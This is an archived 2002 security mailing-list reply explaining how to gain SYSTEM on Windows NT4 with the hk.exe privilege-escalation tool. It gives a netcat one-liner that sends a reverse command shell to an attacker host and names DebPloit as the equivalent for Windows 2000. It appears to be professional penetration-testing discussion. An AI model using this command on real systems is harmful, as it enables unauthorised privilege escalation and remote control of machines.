From: Daniel Polombo (polombo@cartel-securite.fr)
Date: Tue Jul 30 2002 - 07:41:19 EDT
Le jeu 11/07/2002 à 19:18, Bill Pennington wrote :
> Then just run netcat via hk.exe, connect to the listener, and bingo you
> are SYSTEM.
>
> It has been a while since I have done this so I don't recall the exact
> syntax but that should get you pointed in the right direction.
hk <command>
For instance :
hk nc -d -e cmd.exe attacker:port
will shovel a shell to attacker:port.
Note that hk only works on NT4 (up to sp6a, meaning that most NT boxes
you'll ever meet should be vulnerable). For win2k, have a look at
DebPloit instead.
-- Daniel Polombo Consultant Cartel Sécurité ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:24 EDT